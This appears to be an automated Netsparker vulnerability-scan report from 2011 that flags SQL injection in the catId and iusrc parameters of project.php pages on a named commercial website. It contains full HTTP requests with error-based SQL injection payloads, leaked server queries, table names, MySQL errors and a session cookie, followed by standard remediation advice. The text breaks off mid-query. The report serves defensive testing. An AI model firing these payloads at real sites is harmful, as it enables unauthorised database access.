select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=3/'Duplicate entry '_!@4dilemma:0' for key 1

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='%2B(selec..

Parameters

Parameter	Type	Value
catId	GET	50002
iusrc	GET	'+(select 1 and row(1,1)>(select count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4029
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1

[High Possibility] SQL Injection

4 TOTAL

CRITICAL

SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

MSDN - Protect From SQL Injection in ASP.NET

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter	Type	Value
catId	GET	'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc	GET	'+(select 1 and row(1,1)>(select count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/hins00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:23:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5230
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter	Type	Value
catId	GET	50002
iusrc	GET	'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:48:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3358
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5

- /ppc/leadflow/hins00/leadflow/hins00/project.php

/ppc/leadflow/hins00/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='%2B%20(select+convert..

Parameters

Parameter	Type	Value
catId	GET	'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc	GET	3

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=tl20kuubb8ljtr3o3ev30h8vq4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:51:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3454
Connection: close
Content-Type: text/html; charset=UTF-8

select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=3/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 